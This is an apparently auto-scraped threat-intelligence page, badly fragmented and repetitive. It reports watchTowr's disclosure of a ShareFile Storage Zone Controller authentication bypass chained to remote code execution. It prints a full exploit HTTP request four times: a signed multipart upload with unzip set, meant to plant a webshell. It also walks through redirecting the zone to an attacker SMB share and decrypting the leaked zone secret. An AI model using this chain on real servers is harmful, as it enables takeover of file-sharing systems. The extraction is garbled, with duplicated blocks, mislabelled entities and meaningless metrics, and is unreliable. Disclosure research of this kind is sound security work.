X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Strict-Transport-Security
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
X-XSS-Protection
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
X-Frame-Options: DENY
Date: Mon
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
GMT
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Content-Length
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
DOCTYPE
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Login.aspx
When accessing the endpoint through a browser, you’re redirected via the
Location
header to authenticate via
Login.aspx
which 403’s as mentioned before (it's only for
localhost
access).
organisation
Response
In this particular instance, as ShareFile supplies the
false
flag:
The Response is a Status Code 302 redirecting to
/ConfigService/Login.aspx?callerpage=Admin
The remaining functionality within the
ConfigService.
organisation
ShareFiles
So it’s like SaaS in that you can authenticate and manage your files; actually, the data isn’t stored within ShareFiles infrastructure.
organisation
SMB
It can be configured to be hosted on the local file system, SMB servers, cloud bucket storage, etc.
organisation
Progress’s
To clarify, ShareFile has a cloud offering, which is their “SaaS”, this is Progress’s main interface and infrastructure for managing files.
organisation
ASMX
.NET applications such as this have a variety of ways in which interaction can be achieved, for example, with ShareFile, there are:
ASHX, ASMX, and ASPX extension files, which execute scripted code.
organisation
PHP
For those unfamiliar, a behavior that was neither common nor unheard of was present in PHP applications.
organisation
EAR
This is known as “
CWE-698: Execution After Redirect (EAR)
”.
organisation
EventArgs
protected void Page_Load(object sender, EventArgs e)
{
this._logger.
organisation
ActionHeader
ActionHeader = "Select ShareFile " + (Admin.isMultiTenant ?
organisation
ApplicationInstance
ApplicationInstance;
if (applicationInstance == null)
{
return;
}
applicationInstance.
organisation
Authentication Bypass
Onwards To RCE
Armed with our newly minted Authentication Bypass vulnerability, we charged on.
organisation
Storage Zone Controllers
This can be in various shapes and forms, including:
SharePoint
AWS S3 Buckets, Azure Storage Containers
SMB Servers
Local File System
From an external perspective, going through the flow of trying to “Create new Zone” presented errors that we were not able to overcome, so we quickly moved on from this function and looked at what was possible with “Join existing Zone”, which will be present in most, if not all, the exposed Storage Zone Controllers on the Internet.
organisation
Hostname
Hostname
Hostname
Hostname of the installation
External Address
This is the Internet facing URL for which the ShareFile SaaS can reach the instance to sync configs, data etc
Storage Repository
The method in which the files for the ShareFile account are stored.
organisation
External Address
Hostname
Hostname of the installation
External Address
This is the Internet facing URL for which the ShareFile SaaS can reach the instance to sync configs, data etc
Storage Repository
The method in which the files for the ShareFile account are stored.
organisation
Storage Repository
Hostname
Hostname of the installation
External Address
This is the Internet facing URL for which the ShareFile SaaS can reach the instance to sync configs, data etc
Storage Repository
The method in which the files for the ShareFile account are stored.
organisation
API/Rest
Passphrase
The password which is used to encrypt API/Rest endpoints of the current Zone Controller.
organisation
API
Initially, when creating a Zone, there is a need to utilize a
Passphrase
, this value is used to encrypt all API interactions with that particular
Primary Zone Controller
.
organisation
Passphrase
However, when making modifications to fields such as the
Storage Repository
or
External Address
etc, the value for the
Passphrase
is auto-populated by the server, rendering the need for this null and void.
organisation
Storage Zone Controller
To do this, we configured an independent malicious Storage Zone Controller to coerce our victim Controller to connect via the “Primary Zone Controller” field.
organisation
UNC
As the parameter called
Network Share Location
suggests, we suppose that one should provide the UNC path leading to the SMB share here.
organisation
StorageCenter
StorageCenter.
organisation
BusinessLogic
BusinessLogic.
organisation
GUID
This is because:
The file uploaded is renamed to some “random” key (name), like GUID.
organisation
ContentLength
ContentLength == 0L)
{
return Upload.ProcessZeroByteFile(fileControl.
organisation
Upload
ContentLength == 0L)
{
return Upload.ProcessZeroByteFile(fileControl.
organisation
UUID
Unfortunately,
ShareFileFileId
is an auto-generated UUID.
organisation
HttpMethod
HttpMethod == "OPTIONS")
{
base.
organisation
UploadLogic
NewGuid().ToString("n");
}
UploadLogic.
organisation
num2
= new Hashtable();
int num2 = 0;
bool flag = false;
if (requestKeys["unzip"] !
organisation
null &&
null && (requestKeys["unzip"] == "true" || requestKeys["unzip"] == "on")) //
organisation
InputFile
UnzipFiles(new InputFile
organisation
File7
File7, this.File8, this.
organisation
Network Share Location
If we set
unzip
parameter to
true
, the ZIP content will be extracted to some directory in the already modified
Network Share Location
(which we control).
organisation
PoC
Even though it looks simple at this point, a final PoC required some effort.
organisation
UI
This is because we couldn’t find a way to use this endpoint in the UI, so we had to craft the HTTP request from scratch.
organisation
HMAC-SHA256
You need to HMAC-SHA256 sign the
/configservice/api/stroagezoneconfig
string with the current ShareFile passphrase.
organisation
ZoneConfig
In a response, you will notice the
TempData2
:
{
"ZoneConfig":
{
"TempData2":"CbeqUAmHAbM7HuaDlAhgZ4N4dCC4u2zr/gOtQ6aySFgH7FU+21BiEZ5ZGw0WwMne",
"...":"..."
}
}
b) Decrypt
Zone Secret
Our freshly leaked
TempData2
, is in fact base64 encoded and AES encrypted
Zone Secret
.
organisation
AES
In a response, you will notice the
TempData2
:
{
"ZoneConfig":
{
"TempData2":"CbeqUAmHAbM7HuaDlAhgZ4N4dCC4u2zr/gOtQ6aySFgH7FU+21BiEZ5ZGw0WwMne",
"...":"..."
}
}
b) Decrypt
Zone Secret
Our freshly leaked
TempData2
, is in fact base64 encoded and AES encrypted
Zone Secret
.
organisation
HMAC
In the last step, you can use the decrypted
Zone Secret
to calculate the HMAC-SHA256 for the upload request.
The researchers note that, for the exploit to work, attackers must generate valid HMAC signatures and extract and decrypt internal secrets.
organisation
DAG
We wouldn’t be ourselves if we didn’t provide you with both a Detection Artifact Generator (DAG) and a demo of the Detection Artifact Generator in action.
organisation
the Detection Artifact Generator
We wouldn’t be ourselves if we didn’t provide you with both a Detection Artifact Generator (DAG) and a demo of the Detection Artifact Generator in action.
organisation
WatchTowr
Overview of the exploit chain
Source: WatchTowr
Impact and exposure
By watchTowr's scans, there are about 30,000 Storage Zone Controller instances exposed on the public internet.
organisation
New Progress
New Progress ShareFile flaws can be chained in pre-auth RCE attacks.
organisation
Progress
SZC gives customers more control over their data by allowing them to store it on their infrastructure (either on-prem or in a third-party cloud provider) or on the Progress systems.
WT-2026-0006
Threat actors used a Python PoC to chain Authentication Bypass WT-2026-0006 and Remote Code Execution WT-2026-0007 attacks in pre-auth RCE attacks.
Click on any entity below to view its context and source!
tactic
Remote Code Execution
6th February 2026
watchTowr hunts across client attack surfaces for exposure
6th February 2026
Progress Security Team acknowledges receipt of disclosure for WT-2026-0006
13th February 2026
watchTowr discloses Remote Code Execution Vulnerability WT-2026-0007 to Progress Security Team.
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
tactic
T1059.006 - Python
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
organisation
the Authentication Bypass
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
organisation
Timeline
Date
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
organisation
Detail
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
organisation
Progress Security Team
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
2nd April 2026
Threat actors exploited vulnerabilities in ShareFile to launch pre-authentication Remote Code Execution (RCE) attacks.
Tactical Metrics
Metrics
infrastructure
12.3
Software Version
Click for context!
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
Metrics
data_breach
2,701
Authentication Bypass Cve-2026 Remote Execution Sharefile
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
Metrics
infrastructure
5.12.4
Software Version
These vulnerabilities were resolved in version
5.12.4
, release to ShareFile customers on branch 5.x on March 10, 2026.
10th March 2026
watchTowr observes the release of Storage Zone Controller
5.12.4
and confirms it remediates the disclosed vulnerabilities.
Following watchTowr's responsible disclosure, the problems have been addressed in Progress ShareFile 5.12.4, released on March 10.
The vendor released security updates in version 5.12.4, released on March 10.
Metrics
data_breach
1
------Webkitformboundary7Ma4Ywxktrzu0Gw
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
Metrics
data_breach
2
------Webkitformboundary7Ma4Ywxktrzu0Gw
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
ShareFileFileId; // [2]
string text3 = ShareFile.
Metrics
data_breach
3
------Webkitformboundary7Ma4Ywxktrzu0Gw
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
Metrics
data_breach
123
------Webkitformboundary7Ma4Ywxktrzu0Gw
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
Intelligence Sources
Zero Day Fans
2026-04-02
BleepingComputer
2026-04-02
New Progress ShareFile flaws can be chained in pre-auth RCE attacks
BleepingComputer
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Incident Version History
CURRENT VERSION
Last Updated: 2026-04-27T12:01
Comprehensive Tactical Telemetry
Highly Correlated Entities
79x
organisation
Identified Entity
Functionality
entity
16x
timeline
Temporal Reference
March 10, 2026
date
4x
data breach
------Webkitformboundary7Ma4Ywxktrzu0Gw
1
------webkitformboundary7ma4ywxktrzu0gw
3x
tactic
Cyber Operation Type
Ransomware
tactic
3x
attribution
Attributing Entity
APT
authority
2x
vulnerability
Exploited CVE
CVE-2026-2699
cve
2x
infrastructure
Software Version
12.3
version
2x
general metric
Wt-2026
7
wt-2026
2x
tactic
MITRE ATT&CK Technique
T1584.004 - Server
technique
2x
general metric
Allow Headers
540
allow headers
Contextual Telemetry
Context Block
14 METRICS
source region
Origin Country
United States
country
data breach
Authentication Bypass Cve-2026 Remote Execution Sharefile
2,701
authentication bypass cve-2026 remote execution sharefile
general metric
Http Status Code
403
http status code
general metric
Http/1.1
302
http/1.1
general metric
Mon
23
mon
general metric
Remote Code Execution
2,701
remote code execution
general metric
=
0
=
general metric
Circa Instances
30,000
circa instances
general metric
Codes
401
codes
general metric
Entities
2
entities
general metric
Characters
10,000
characters
source region
Origin Region
EUROPE
region
general metric
Exposed Instances
700
exposed instances
general metric
February
13
february
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.